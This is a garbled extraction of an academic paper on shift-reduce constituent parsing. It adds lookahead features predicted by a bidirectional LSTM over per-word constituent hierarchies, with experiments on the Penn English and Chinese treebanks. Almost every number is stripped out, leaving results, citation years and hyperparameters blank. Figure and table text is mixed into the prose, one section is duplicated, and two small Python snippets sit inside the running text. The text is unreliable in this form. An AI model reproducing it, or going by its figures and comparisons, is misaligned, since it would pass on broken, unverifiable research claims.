transition-based models can be fast and accurate for constituent parsing. compared with chart-based models, they leverage richer features by extracting history information from a parser stack, which consists of a sequence of non-local constituents. on the other hand, during incremental parsing, constituent information on the right hand side of the current word is not utilized, which is a relative weakness of shift-reduce parsing. to address this limitation, we leverage a fast neural model to extract lookahead features. in particular, we build a bidirectional lstm model, which leverages full sentence information to predict the hierarchy of constituents that each word starts and ends. the results are then passed to a strong transition-based constituent parser as lookahead features. the resulting parser gives . % absolute improvement in wsj and . % in ctb compared to the baseline, giving the highest reported accuracies for fully-supervised parsing.

introduction
transition-based constituent parsers are fast and accurate, performing incremental parsing using a sequence of state transitions in linear time. pioneering models rely on a classifier to make local decisions, searching greedily for local transitions to build a parse tree (sagae and lavie, ). zhu et al. ( ) use a beam search framework, which preserves linear time complexity of greedy search, while alleviating the disadvantage of error propagation. the model gives state-of-the-art accuracies at a speed of sentences per second on the standard wsj benchmark (marcus et al., ).

zhu et al. ( ) exploit rich features by extracting history information from a parser stack, which consists of a sequence of non-local constituents. however, due to the incremental nature of shift-reduce parsing, the right-hand side constituents of the current word cannot be used to guide the action at each step. such lookahead features (tsuruoka et al., ) correspond to the outside scores in chart parsing (goodman, ), which has been effective for obtaining improved accuracies. to leverage such information for improving shift-reduce parsing, we propose a novel neural model to predict the constituent hierarchy related to each word before parsing.
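to make the notion of per-word constituent hierarchies concrete, the python sketch below shows one way to read off, from an unbinarized tree, the constituents that each word starts and ends, ordered top-down. the nested (label, children) tuple encoding of trees and the function name are assumptions for illustration only, not part of the parser.

def hierarchies(tree):
    """return the words plus, for each word index, the constituents it starts and ends (top-down)."""
    words, starts, ends = [], {}, {}

    def walk(node):
        if isinstance(node, str):              # leaf: a word
            words.append(node)
            i = len(words) - 1
            return i, i
        label, children = node
        first = last = None
        for child in children:
            lo, hi = walk(child)
            if first is None:
                first = lo
            last = hi
        # the leftmost word starts this constituent, the rightmost word ends it;
        # labels are collected bottom-up while unwinding the recursion
        starts.setdefault(first, []).append(label)
        ends.setdefault(last, []).append(label)
        return first, last

    walk(tree)
    s_type = {i: labels[::-1] for i, labels in starts.items()}   # reverse to top-down order
    e_type = {i: labels[::-1] for i, labels in ends.items()}
    return words, s_type, e_type

# a simplified example in the spirit of figure 1
tree = ("S", [("NP", ["the", "students"]),
              ("VP", ["like", ("NP", ["this", "book"])])])
words, s_type, e_type = hierarchies(tree)
print(words[0], s_type.get(0, []), e_type.get(0, []))   # the ['S', 'NP'] []
print(words[4], s_type.get(4, []), e_type.get(4, []))   # book [] ['S', 'VP', 'NP']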
our idea is inspired by the work of roark and hollingshead ( ) and zhang et al. ( b), which shows that shallow syntactic information gathered over the word sequence can be utilized for pruning chart parsers, improving chart parsing speed without sacrificing accuracies. for ex- ample, roark and hollingshead ( ) predict con- stituent boundary information on words as a pre- processing step, and use such information to prune the chart. since such information is much lighter- weight compared to full parsing, it can be predicted relatively accurately using sequence labellers. different from roark and hollingshead ( ), we collect lookahead constituent information for shift-reduce parsing, rather than pruning informa- tion for chart parsing. our main concern is improv- ing the accuracy rather than improving the speed. accordingly, our model should predict the con- stituent hierarchy for each word rather than simple boundary information. for example, in figure (a), the constituent hierarchy that the word “the” starts is “s → np”, and the constituent hierarchy that the word “table” ends is “s → vp → np → pp → np”. transactions of the association for computational linguistics, vol. , pp. – , . action editor: brian roark. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. np vb dt nn np vp s (a) (b) dt nns the students like this book adjp jj past cc and jj present np pp np dt nn the table in on word s-type e-type the [s: s np] [e: Ø ] past [s: adjp] [e: Ø ] and [s: Ø] [e: Ø ] present [s: Ø] [e: adjp ] students [s: Ø] [e: np ] like [s: vp] [e: Ø ] this [s: np np] [e: Ø ] book [s: Ø] [e: np ] on [s: pp] [e: Ø ] the [s: np] [e: Ø ] table [s: Ø [e: s vp np pp np ] figure : example constituent hierarchies for the sentence “the past and present students like this book on the table”. (a) parse tree; (b) constituent hierarchies on words. for each word, we predict both the constituent hier- archy it starts and the constituent hierarchy it ends, using them as lookahead features. the task is challenging. first, it is significantly more difficult compared to simple sequence la- belling, since two sequences of constituent hierar- chies must be predicted for each word in the input sequence. second, for high accuracies, global fea- tures from the full sentence are necessary since con- stituent hierarchies contain rich structural informa- tion. third, to retain high speed for shift-reduce parsing, lookahead feature prediction must be exe- cuted efficiently. it is highly difficult to build such a model using manual discrete features and structured search. fortunately, sequential recurrent neural networks (rnns) are remarkably effective models to encode the full input sentence. we leverage rnns for build- ing our constituent hierarchy predictor. in particular, an lstm (hochreiter and schmidhuber, ) is used to learn global features automatically from the input words. for each word, a second lstm is then used to generate the constituent hierarchies greed- ily using features from the hidden layer of the first lstm, in the same way a neural language model de- coder generates output sentences for machine trans- lation (bahdanau et al., ). the resulting model solves all three challenges raised above. for fully- supervised learning, we learn word embeddings as part of the model parameters. in the standard wsj (marcus et al., ) and ctb . tests (xue et al., ), our parser gives . f and . 
f improvement, respectively, over the initial state [φ, ,false, ] final state [s,n,true,m : n <= m <= n] induction rules: shift [s,i,false,k] [s|w,i+ ,false,k+ ] reduce-l/r-x [s|s s ,i,false,k] [s|x,i,false,k+ ] unary-x [s|s ,i,false,k] [s|x,i,false,k+ ] finish [s,n,false,k] [s,n,true,k+ ] idle [s,n,true,k] [s,n,true,k+ ] figure : deduction system for the baseline shift- reduce parsing process. baseline of zhu et al. ( ), resulting in a accuracy of . f for english and . f for chinese, which are the best for fully-supervised models in the literature. we release our code, based on zpar (zhang and clark, ; zhu et al., ), at https://github.com/sutdnlp/lookaheadconparser. baseline system we adopt the parser of zhu et al. ( ) for a base- line, which is based on the shift-reduce process of sagae and lavie ( ) and the beam search strat- egy of zhang and clark ( ) with global percep- tron training. . the shift-reduce system shift-reduce parsers process an input sentence in- crementally from left to right. a stack is used to maintain partial phrase-structures, while the incom- ing words are ordered in a buffer. at each step, a transition action is applied to consume an input word or construct a new phrase-structure. the set of tran- sition actions are • shift: pop the front word off the buffer, and push it onto the stack. • reduce-l/r-x: pop the top two constituents off the stack (l/r means that the head is the left constituent or the right constituent, respec- tively), combine them into a new constituent with label x, and push the new constituent onto the stack. • unary-x: pop the top constituent off the stack, raise it to a new constituent x, and push the new constituent onto the stack. • finish: pop the root node off the stack and end parsing. • idle: no-effect action on a completed state without changing items on the stack or buffer, used to ensure that the same number of actions are in each item in beam search (zhu et al., ). the deduction system for the process is shown in figure , where a state is represented as [stack, buffer front index, completion mark, action index], and n is the number of words in the input. for ex- ample, given the sentence “they like apples”, the action sequence “shift, shift, shift, reduce- l-vp, reduce-r-s” gives its syntax “(s they (vp like apples) )”. . search and training beam-search is used for decoding with the k best state items at each step being kept in the agenda. during initialization, the agenda contains only the initial state [φ, ,false, ]. at each step, each state in the agenda is popped and expanded by apply- ing all valid transition actions, and the top k re- sulting states are put back onto the agenda (zhu et al., ). the process repeats until the agenda is description templates unigram s tc,s wc,s tc,s wc,s tc s wc,s tc,s wc,q wt,q wt q wt,q wt,s lwc,s rwc s uwc,s lwc,s rwc,s uwc bigram s ws w,s ws c,s cs w,s cs c s wq w,s wq t,s cq w,s cq t q wq w,q wq t,q tq w,q tq t s wq w,s wq t,s cq w,s cq t trigram s cs cs c,s ws cs c,s cs wq t s cs cs w,s cs cq t,s ws cq t s cs wq t,s cs cq w extended s llwc,s lrwc,s luwc s rlwc,s rrwc,s ruwc s ulwc,s urwc,s uuwc s llwc,s lrwc,s luwc s rlwc,s rrwc,s ruwc table : baseline feature templates, where si rep- resents the ith item on the top of the stack and qi denotes the ith item in the front of the buffer. 
the symbol w denotes the lexical head of an item; the symbol c denotes the constituent label of an item; the symbol t is the pos of a lexical head; u denotes a unary child; si ll denotes the left child of si's left child.

empty, and the best completed state is taken as output. the score of a state is the total score of the transition actions that have been applied to build it:

c(α) = Σ_{i=1..N} Φ(α_i) · θ⃗ ( )

here Φ(α_i) represents the feature vector for the ith action α_i in the state item α. N is the total number of actions in α. the model parameter vector θ⃗ is trained online using the averaged perceptron algorithm with the early-update strategy (collins and roark, ).

. baseline features
our baseline features are taken from zhu et al. ( ). as shown in table , they include the unigram, bigram, trigram features of zhang and clark ( ) and the extended features of zhu et al. ( ).

[table : lookahead feature templates — s gs, s ge, s gs, s ge, q gs, q ge, q gs, q ge — where si represents the ith item on the top of the stack and qi denotes the ith item in the front end of the buffer. the symbols gs and ge denote the next-level constituent in the s-type hierarchy and the e-type hierarchy, respectively.]

global lookahead features
the baseline features suffer two limitations, as mentioned in the introduction. first, they are relatively local to the state, considering only the neighbouring nodes of s (top of stack) and q (front of buffer). second, they do not consider lookahead information beyond s , or the syntactic structure of the buffer and sequence. we use an lstm to capture full sentential information in linear time, representing such global information that is fed into the baseline parser as a constituent hierarchy for each word. lookahead features are extracted from the constituent hierarchy to provide top-down guidance for bottom-up parsing.

. constituent hierarchy
in a constituency tree, each word can start or end a constituent hierarchy. as shown in figure , the word "the" starts a constituent hierarchy "s → np". in particular, it starts a constituent s at the top level, dominating a constituent np. the word "table" ends a constituent hierarchy "s → vp → np → pp → np". in particular, it ends a constituent hierarchy with a constituent s on the top level, dominating a vp (starting from the word "like"), then an np (starting from the noun phrase "this book"), then a pp (starting from the word "in"), and finally an np (starting from the word "the"). the extraction of constituent hierarchies for each word is based on unbinarized grammars, reflecting the unbinarized trees that the word starts or ends. the constituent hierarchy is empty (denoted as φ) if the corresponding word does not start or end a constituent. the constituent hierarchies are added into the shift-reduce parser as soft features (section . ).

formally, a constituent hierarchy is defined as

[type: c → c → ... → cz],

where c is a constituent label (e.g. np), "→" represents the top-down hierarchy, and type can be s or e, denoting that the current word starts or ends the constituent hierarchy, respectively, as shown in figure . compared with full parsing, the constituent hierarchies associated with each word have no forced structural dependencies between each other, and therefore can be modelled more easily, for each word individually. being soft lookahead features rather than hard constraints, inter-dependencies are not crucial for the main parser.

. lookahead features
the lookahead feature templates are defined in table . in order to ensure parsing efficiency, only simple feature templates are taken into consideration. the lookahead features of a state are instantiated for the top two items on the stack (i.e., s and s ) and buffer (i.e., q and q ). the new function Φ′ is defined to output the lookahead feature vector. the scoring of a state in our model is based on formula ( ) but with a new term Φ′(α_i) · θ⃗′:

c′(α) = Σ_{i=1..N} [Φ(α_i) · θ⃗ + Φ′(α_i) · θ⃗′]

for each word, the lookahead feature represents the next-level constituent in the top-down hierarchy, which can guide bottom-up parsing. for example, figure shows two intermediate states during parsing. in figure (a), the s-type and e-type lookahead features of s (i.e., the word "the") are extracted from the bottom level of its constituent hierarchies, namely np and null, respectively. on the other hand, in figure (b), the s-type lookahead feature of s is extracted from the s-type constituent hierarchy of the same word "the", but it is s at the current hierarchical level. the e-type lookahead feature, on the other hand, is extracted from the e-type constituent hierarchy of the end word "students" of the vp constituent, which is null at the next level. lookahead features for items on the buffer are extracted in the same way. the lookahead features are useful for guiding shift-reduce decisions given the current state.

[figure : two intermediate states for parsing the sentence "the past and present students like this book on the table". each item on the stack or buffer has two constituent hierarchies: s-type (left) and e-type (right), in the corresponding box. note that the e-type constituent hierarchy of the word "students" is incorrectly predicted, yet used as soft constraints (i.e., features) in our model.]

for example, given the intermediate state in figure (a), s has an s-type lookahead feature adjp, and q in the buffer has an e-type lookahead feature adjp. this indicates that the two items are likely to be reduced into the same constituent. further, s cannot end a constituent because of the empty e-type constituent hierarchy. as a result, the final shift-reduce parser will assign a higher score to the shift decision.

constituent hierarchy prediction
we propose a novel neural model for constituent hierarchy prediction. inspired by the encoder-decoder framework for neural machine translation (bahdanau et al., ; cho et al., ), we use an lstm to capture full sentence features, and another lstm to generate the constituent hierarchies for each word. compared with a crf-based sequence labelling model (roark and hollingshead, ), the proposed model has three advantages. first, the global features can be automatically represented. second, it can avoid the exponentially large number of labels if constituent hierarchies are treated as unique labels. third, the model size is relatively small, and does not have a large effect on the final parser model. as shown in figure , the neural network consists of three main layers, namely the input layer, the encoder layer and the decoder layer.
lookahead features the lookahead feature templates are defined in table . in order to ensure parsing efficiency, only simple feature templates are taken into consideration. the lookahead features of a state are instantiated for the top two items on the stack (i.e., s and s ) and buffer (i.e., q and q ). the new function Φ′ is defined to output the lookahead features vector. the scoring of a state in our model is based on formula ( ) but with a new term Φ′(αi) · ~θ′: c′(α) = n∑ i= Φ(αi) ·~θ + Φ′(αi) · ~θ′ for each word, the lookahead feature represents the next level constituent in the top-down hierarchy, which can guide bottom-up parsing. for example, figure shows two intermediate states during parsing. in figure (a), the s-type and e-type lookahead features of s (i.e., the word “the” are extracted from the constituent hierarchy in the bottom level, namely np and null, respec- tively. on the other hand, in figure (b), the s-type lookahead feature of s is extracted from the s-type constituent hierarchy of same word “the”, but it is s based on current hierarchical level. the e-type lookahead feature, on the other hand, is extracted from the e-type constituent hierarchy of end word “students” of the vp constituent, which is null in the next level. lookahead features for items on the buffer are extracted in the same way. the lookahead features are useful for guiding shift-reduce decisions given the current state. for stack buffer dt the jj past cc and jj present s s s np Ø adjp Ø s gs s ge=nulls gs s ge=null Ø Ø Ø adjp q q q gs=null q ge=null q gs=null q ge np vb dt nn dt nns s s q q the students like this book s np vp vp Ø np npØ Ø s ge=null s gs s ge=null q gs q ge=null q gs=null stack buffer q ges gs adjp past and present (a) (b) incorrect constituent hierarchy look-ahead features configuration figure : two intermediate states for parsing on the sentence “the past and present students like this book on the table”. each item on the stack or buffer has two constituent hierarchies: s-type (left) and e-type (right), respectively, in the corresponding box. note that the e-type constituent hierarchy of the word “students” is incorrectly predicted, yet used as soft constraints (i.e., features) in our model. example, given the intermediate state in figure (a), s has a s-type lookahead feature adjp, and q in the buffer has e-type lookahead feature adjp. this indicates that the two items are likely reduced into the same constituent. further, s cannot end a con- stituent because of the empty e-type constituent hi- erarchy. as a result, the final shift-reduce parser will assign a higher score to the shift decision. constituent hierarchy prediction we propose a novel neural model for constituent hi- erarchy prediction. inspired by the encoder-decoder framework for neural machine translation (bah- danau et al., ; cho et al., ), we use an lstm to capture full sentence features, and another lstm to generate the constituent hierarchies for each word. compared with a crf-based sequence labelling model (roark and hollingshead, ), the proposed model has three advantages. first, the global features can be automatically represented. second, it can avoid the exponentially large num- ber of labels if constituent hierarchies are treated as unique labels. third, the model size is relatively small, and does not have a large effect on the final parser model. as shown in figure , the neural network con- sists of three main layers, namely the input layer, the encoder layer and the decoder layer. 
the input layer represents each word using its characters and token information; the encoder hidden layer uses a bidirectional recurrent neural network structure to learn global features from the sentence; and the de- coder layer predicts constituent hierarchies accord- ing to the encoder layer features, by using the atten- tion mechanism (bahdanau et al., ) to compute the contribution of each hidden unit of the encoder. . input layer the input layer generates a dense vector representa- tion of each input word. we use character embed- dings to alleviate oov problems in word embed- dings (ballesteros et al., ; santos and zadrozny, ; kim et al., ), concatenating character- embeddings of a word with its word embedding. formally, the input representation xi of the word wi is computed by: xi = [xwi ; ci att] ci att = ∑ j αijc ′ ij, where xwi is a word embedding vector of the word wi according to a embedding lookup table, ci att is a character embedding form of the word wi, cij is the embedding of the jth character in wi, c′ij is the character window representation centered at cij, and αij is the contribution of the c′ij to ci att, which is computed by: αij = e f(xwi,c ′ ij) ∑ k e f(xwi,c ′ ik ) f is a non-linear transformation function. … h h hn h h hn … … softmax … c , c , c ,m … … xw attention pooling decoder layer input layer encoder layer y j x xnx s js j- c _att … x’ x’nx’ h h hn … cn, … … xwn attention pooling cn_att … cn, cn,m’ windows windows windows … c’ , c’ , c’ ,m c’n, c’n, c’n,m’ figure : structure of the constituent hierarchy pre- diction model. −→ hi denotes the left-to-right encoder hidden units; ←− hi denotes the right-to-left encoder hidden units; s denotes the decoder hidden state vec- tor; and yij is the jth label of the word wi. . encoder layer the encoder first uses a window strategy to repre- sent input nodes with their corresponding local con- text nodes. formally, a word window representation takes the form x′i = [xi−win; ...; xi; ...; xi+win]. second, the encoder scans the input sentence and generates hidden units for each input word using a recurrent neural network (rnn), which represents features of the word from the global sequence. for- mally, given the windowed input nodes x′ , x ′ , ..., x′n for the sentence w , w , ..., wn, the rnn layer calculates a hidden node sequence h , h , ..., hn. long short-term memory (lstm) mitigates the vanishing gradient problem in rnn training, by in- troducing gates (i.e., input i, forget f and output o) and a cell memory vector c. we use the variation of graves and schmidhuber ( ). formally, the values in the lstm hidden layers are computed as follows: ii = σ(w x ′ i + w hi− + w � ci− + b ) fi = − ii c̃i = tanh(w x ′ i + w hi− + b ) ci = fi � ci− + ii � c̃i oi = σ(w x ′ i + w hi− + w � ci + b ) hi = oi � tanh(ci), where � is pair-wise multiplication. further, in or- der to collect features for xi from both x′ , .., x ′ i− and x′i+ , ... x ′ n, we use a bidirectional variation (schuster and paliwal, ; graves et al., ). as shown in figure , the hidden units are generated by concatenating the corresponding hidden layers of a left-to-right lstm −→ hi and a right-to-left lstm ←− hi , where ←→ hi = [ −→ hi ; ←− hi ] for each word wi. . decoder layer the decoder hidden layer uses two different lstms to generate the s-type and e-type sequences of con- stituent labels from each encoder hidden output, re- spectively, as shown in figure . each constituent hierarchy is generated bottom-up recurrently. 
in particular, a sequence of state vectors is generated recurrently, with each state yielding an output constituent label. the process starts with a ~0 state vector and ends when a null constituent is generated. the recurrent state transition process is achieved using an lstm model, with the hidden vectors of the encoder layer being used as context features. formally, for word w_i, the value of the jth state unit s_ij of the lstm is computed by:

s_ij = f(s_{ij−1}, a_ij, ↔h_i),

where the context a_ij is computed by:

a_ij = Σ_k β_ijk ↔h_k
β_ijk = exp(f(s_{ij−1}, ↔h_k)) / Σ_k′ exp(f(s_{ij−1}, ↔h_k′))

here, different from typical mt models (bahdanau et al., ), the chain is predicted sequentially in a feed-forward way with no feedback of the prediction made. we found that this fast alternative gives similar results. here ↔h_k refers to the encoder hidden vector for w_k. the weights of contribution β_ijk are computed using the attention mechanism (bahdanau et al., ). the constituent labels are generated from each state unit s_ij, where each constituent label y_ij is the output of a softmax function,

p(y_ij = l) = exp(s_ij⊤ w_l) / Σ_k exp(s_ij⊤ w_k)

y_ij = l denotes that the jth label of the ith word is l (l ∈ L). as shown in figure , the softmax functions are applied to the state units of the decoder, generating hierarchical labels bottom-up, until the default label null is predicted.

. training
we use two separate models to assign the s-type and e-type labels, respectively. for training each constituent hierarchy predictor, we minimize the following training objective:

L(θ) = − Σ_{i=1..T} Σ_{j=1..z_i} log p_ijo + (λ/2) ||θ||²,

where T is the length of the sentence, z_i is the depth of the constituent hierarchy of the word w_i, p_ijo stands for p(y_ij = o), which is given by the softmax function, and o is the gold label. we apply back-propagation, using momentum stochastic gradient descent (sutskever et al., ) with a learning rate of η = . for optimization and a regularization parameter λ = − .

experiments
. experiment settings
our english data are taken from the wall street journal (wsj) sections of the penn treebank (marcus et al., ). we use sections - for training, section for system development, and section for final performance evaluation. our chinese data are taken from version . of the penn chinese treebank (ctb) (xue et al., ). we use articles - and - for training, articles - for system development, and articles - for final performance evaluation. for both english and chinese data, we adopt zpar for pos tagging, and use ten-fold jackknifing to assign pos tags automatically to the training data. in addition, we use ten-fold jackknifing to assign constituent hierarchies automatically to the training data for training the parser using the constituent hierarchy predictor.

[table : hyper-parameter settings — word embedding size, word window size, character embedding size, character window size, lstm hidden layer size, character hidden layer size.]

[table : performance of the constituent hierarchy predictor and the corresponding parser on the wsj dev dataset, with rows for -layer, -layer and -layer models and columns for s-type, e-type and parser scores. n-layer denotes an lstm model with n hidden layers.]

we use f score to evaluate constituent hierarchy prediction. for example, if the prediction is "s → s → vp → np" and the gold is "s → np → np", the evaluation process matches the two hierarchies bottom-up. the precision is / = . , the recall is / = . and the f score is . .
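the small python sketch below shows one reading of this bottom-up matching: the two hierarchies are aligned from the bottom, a label counts as correct only at the correct position, and precision, recall and f score follow. the function name is illustrative only.

def hierarchy_prf(pred, gold):
    # align the predicted and gold hierarchies from the bottom of the hierarchy upwards
    pred_bu, gold_bu = list(reversed(pred)), list(reversed(gold))
    correct = sum(1 for p, g in zip(pred_bu, gold_bu) if p == g)
    precision = correct / len(pred) if pred else 0.0
    recall = correct / len(gold) if gold else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return precision, recall, f1

# the worked example from the text: prediction "S -> S -> VP -> NP" against gold "S -> NP -> NP"
print(hierarchy_prf(["S", "S", "VP", "NP"], ["S", "NP", "NP"]))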
a label is counted as correct if and only if it occurs at the cor- rect position. we use evalb to evaluate parsing performance, including labelled precision (lp ), labelled recall (lr), and bracketing f . . model settings for training the constituent hierarchy prediction model, gold constituent labels are derived from la- belled constituency trees in the training data. the hyper-parameters are chosen according to develop- ment tests, and the values are shown in table . for the shift-reduce constituency parser, we set the beam size to for both training and decoding, which achieves a good tradeoff between efficiency https://github.com/sutdnlp/zpar http://nlp.cs.nyu.edu/evalb s-type e-type parser all . . . all w/o wins . . . all w/o chars . . . all w/o chars & wins . . . table : performance of the constituent hierarchy predictor and the corresponding parser on the wsj dev dataset. all denotes the proposed model with- out ablation. wins denotes input windows. chars denotes character-based attention. and accuracy (zhu et al., ). the optimal train- ing iteration number is determined on the develop- ment sets. . results of constituent hierarchy prediction table shows the results of constituent hierarchy prediction, where word and character embeddings are randomly initialized, and fine-tuned during train- ing. the third column shows the development pars- ing accuracies when the labels are used for looka- head features. as table shows, when the number of hidden layers increases, both s-type and e-type constituent hierarchy prediction improve. the accu- racy of e-type prediction is relatively lower due to right-branching in the treebank, which makes e-type hierarchies longer than s-type hierarchies. in addi- tion, a -layer lstm does not give significant im- provements compared to a -layer lstm. for better tradeoff between efficiency and accuracy, we choose the -layer lstm as our constituent hierarchy pre- dictor. table shows ablation results for constituent hi- erarchy prediction given by different reduced ar- chitectures, which include an architecture without character embeddings and an architecture with nei- ther character embeddings nor input windows. we find that the original architecture achieves the high- est performance on constituent hierarchy prediction, compared to the two baselines. the baseline only without character embeddings has relatively small influence on constituent hierarchy prediction. on the other hand, the baseline only without input word windows has relatively smaller influence on con- stituent hierarchy prediction. nevertheless, both of these two ablation architectures lead to lower pars- parser lr lp f fully-supervised ratnaparkhi ( ) . . . charniak ( ) . . . collins ( ) . . . sagae and lavie ( )† . . . sagae and lavie ( )† . . . petrov and klein ( ) . . . carreras et al. ( ) . . . shindo et al. ( ) n/a n/a . zhu et al. ( )† . . . socher et al. ( )* n/a n/a . vinyals et al. ( )* n/a n/a . cross and huang ( )*† n/a n/a . dyer et al. ( )*† n/a n/a . this work . . . ensemble shindo et al. ( ) n/a n/a . vinyals et al. ( )* n/a n/a . rerank charniak and johnson ( ) . . . huang ( ) . . . dyer et al. ( )*† n/a n/a . semi-supervised mcclosky et al. ( ) . . . huang and harper ( ) . . . huang et al. ( ) . . . zhu et al. ( )† . . . durrett and klein ( )* n/a n/a . table : comparison of related work on the wsj test set. * denotes neural parsing; † denotes methods using a shift-reduce framework. ing accuracies. 
the baseline removing both the character embeddings and the input word windows has a relatively low f-score. . final results for english, we compare the final results with previous related work on the wsj test sets. as shown in table , our model achieves . % f improvement compared to the baseline parser with fully-supervised learning (zhu et al., ). our model outperforms the state-of-the-art fully- supervised system (carreras et al., ; shindo et al., ) by . % f . in addition, our fully- supervised model also catches up with many state- of-the-art semi-supervised models (zhu et al., ; we treat the methods as semi-supervised if they use pre- trained word embeddings, word clusters (e.g., brown clusters) or extra resources. parser lr lp f fully-supervised charniak ( ) . . . bikel ( ) . . . petrov and klein ( ) . . . zhu et al. ( )† . . . wang et al. ( )‡ n/a n/a . dyer et al. ( )*† n/a n/a . this work . . . rerank charniak and johnson ( ) . . . dyer et al. ( )*† n/a n/a . semi-supervised zhu et al. ( )† . . . wang and xue ( )‡ n/a n/a . wang et al. ( )‡ n/a n/a . table : comparison of related work on the ctb . test set. * denotes neural parsing; † denotes methods using a shift-reduce framework; ‡ denotes joint pos tagging and parsing. huang and harper, ; huang et al., ; dur- rett and klein, ) by achieving . % f on wsj test set. the size of our model is much smaller than the semi-supervised model of zhu et al. ( ), which contains rich features from a large automat- ically parsed corpus. in contrast, our model is about the same in size compared to the baseline parser. we carry out chinese experiments with the same models, and compare the final results with previous related work on the ctb test set. as shown in table , our model achieves . % f improvement com- pared to the state-of-the-art baseline system with fully-supervised learning (zhu et al., ), which is by far the best result in the literature. in addition, our fully-supervised model is also comparable to many state-of-the-art semi-supervised models (zhu et al., ; wang and xue, ; wang et al., ; dyer et al., ) by achieving . % f on the ctb test set. wang and xue ( ) and wang et al. ( ) do joint pos tagging and parsing. . comparison of speed table shows the running times of various parsers on test sets on a intel . ghz processor with g memory. our parsers are much faster than the re- lated parser with the same shift-reduce framework (sagae and lavie, ; sagae and lavie, ). compared to the baseline parser, our parser gives parser #sent/second ratnaparkhi ( ) unk collins ( ) . charniak ( ) . sagae and lavie ( ) . sagae and lavie ( ) . petrov and klein ( ) . carreras et al. ( ) unk zhu et al. ( ) . this work . table : comparison of running times on the test set, where the time for loading models is excluded. the running times of related parsers are taken from zhu et al. ( ). significant improvement on accuracies ( . % to . % f ) at the speed of . sentences per sec- ond , in contrast to . sentences per second on the standard wsj benchmark. error analysis we conduct error analysis by measuring parsing ac- curacies against: different phrase types, constituents of different span lengths, and different sentence lengths. . phrase type table shows the accuracies of the baseline and the final parsers with lookahead features on common phrase types. as the results show, while the parser with lookahead features achieves improvements on all of the frequent phrase types, there are relatively higher improvements on vp, s, sbar and whnp. 
the constituent hierarchy predictor has relatively better performance on s-type labels for the con- stituents vp, whnp and pp, which are prone to errors by the baseline system. the constituent hi- erarchy can give guidance to the constituent parser for tackling the issue. compared to the s-type con- stituent hierarchy, the e-type constituent hierarchy the constituent hierarchy prediction is excluded, which processes an average of sentences per second on a single cpu. the cost of this step is far less than the cost of parsing, and can be essentially eliminated by pipelining the constituent hierarchy prediction and the shift-reduce decoder, by launching the constituent hierarchy predictor first, and then starting pars- ing in parallel as soon as the lookahead output is available for the first sentence, since the lookahead will outpace the parsing from that point forward. span length f s co re (% ) baseline lookahead figure : comparison with the baseline on spans of different lengths. is relatively more difficult to predict, particularly for the constituents with long spans such as vp, s and sbar. despite this, the e-type constituent hi- erarchies with relatively low accuracies also benefit prediction of constituents with long spans. . span length figure shows the f -scores of the two parsers on constituents with different span lengths. as the re- sults show, lookahead features are helpful on both large spans and small spans, and the performance gap between the two parsers is larger as the size of span increases. this reflects the usefulness of long- range information captured by the constituent hier- archy predictor and lookahead features. . sentence length figure shows the f -scores of the two parsers on sentences of different lengths. as the results show, the parser with lookahead features outperforms the baseline system on both short sentences and long sentences. also, the performance gap between the two parsers is larger as the length of sentence in- creases. the constituent hierarchy predictors generate hi- erarchical constituents for each input word using global information. for longer sentences, the pre- dictors yield deeper constituent hierarchies, offer- ing corresponding lookahead features. as a result, compared to the baseline parser, the performance of the parser with lookahead features decreases more slowly as the length of the sentences increases. + f sc or e (% ) baseline lookahead figure : comparison with the baseline on sen- tences of different lengths. sentences with length [ , ) fall in the bin . related work our lookahead features are similar in spirit to the pruners of roark and hollingshead ( ) and zhang et al. ( b), which infer the maximum length of constituents that a particular word can start or end. however, our method is different in three main ways. first, rather than using a crf with sparse local word window features, a neural network is used for dense global features on the sentence. second, not only the size of constituents but also the constituent hierarchy is identified for each word. third, the results are added into a transition-based parser as soft features, rather then being used as hard constraints to a chart parser. our concept of constituent hierarchies is simi- lar to supertags in the sense that both are shallow parses. 
for lexicalized grammars such as combi- natory categorial grammar (ccg), tree-adjoining grammar (tag) and head-driven phrase structure grammar (hpsg), each word in the input sentence is assigned one or more supertags, which are used to identify the syntactic role of the word to constrain parsing (clark, ; clark and curran, ; car- reras et al., ; ninomiya et al., ; dridan et al., ; faleńska et al., ). for a lexical- ized grammar, supertagging can benefit the parsing in both accuracy and efficiency by offering almost- parsing information. in particular, carreras et al. ( ) used the concept of spine for tag (schabes, ; vijay-shanker and joshi, ), which is sim- ilar to our constituent hierarchy. however, there are three differences. first, the spine is defined to de- scribe the main syntactic tree structure with a series np vp s pp sbar advp adjp whnp qp baseline . . . . . . . . . with lookahead feature . . . . . . . . . improvement + . + . + . + . + . + . + . + . + . constituent hierarchy s-type . . . . . . . . . e-type . . . . . . . . . table : comparison between the parsers with lookahead features on different phrases types, with the corresponding constituent hierarchy predictor performances. of unary projections, while constituent hierarchy is defined to describe how words can start or end hi- erarchical constituents (it can be empty if the word cannot start or end constituents). second, spines are extracted from gold trees and used to prune the search space of parsing as hard constraints. in con- trast, we use constituent hierarchies as soft features. third, carreras et al. ( ) use spines to prune chart parsing, while we use constituent hierarchies to improve a linear shift-reduce parser. for lexicalized grammars, supertags can benefit parsing significantly since they contain rich syntac- tic information as almost parsing (bangalore and joshi, ). recently, there has been a line of work on better supertagging. zhang et al. ( a) proposed efficient methods to obtain supertags for hpsg parsing using dependency information. xu et al. ( ) and vaswani et al. ( ) leverage recur- sive neural networks for supertagging for ccg pars- ing. in contrast, our models predict the constituent hierarchy instead of a single supertag for each word in the input sentence. our constituent hierarchy predictor is also related to sequence-to-sequence learning (sutskever et al., ), which has been successfully used in neural machine translation (bahdanau et al., ). the neural model encodes the source-side sentence into dense vectors, and then uses them to generate target- side word by word. there has also been work that di- rectly applies sequence-to-sequence models for con- stituent parsing, which generates constituent trees given raw sentences (vinyals et al., ; luong et al., ). compared to vinyals et al. ( ), who predict a full parse tree from input, our predictors tackle a much simpler task, by predicting the con- stituent hierarchies of each word separately. in ad- dition, the outputs of the predictors are used for soft lookahead features in bottom-up parsing, rather than being taken as output structures directly. by integrating a neural constituent hierarchy pre- dictor, our parser is related to neural network mod- els for parsing, which has given competitive accura- cies for both constituency parsing (dyer et al., ; cross and huang, ; watanabe and sumita, ) and dependency parsing (chen and manning, ; zhou et al., ; dyer et al., ). 
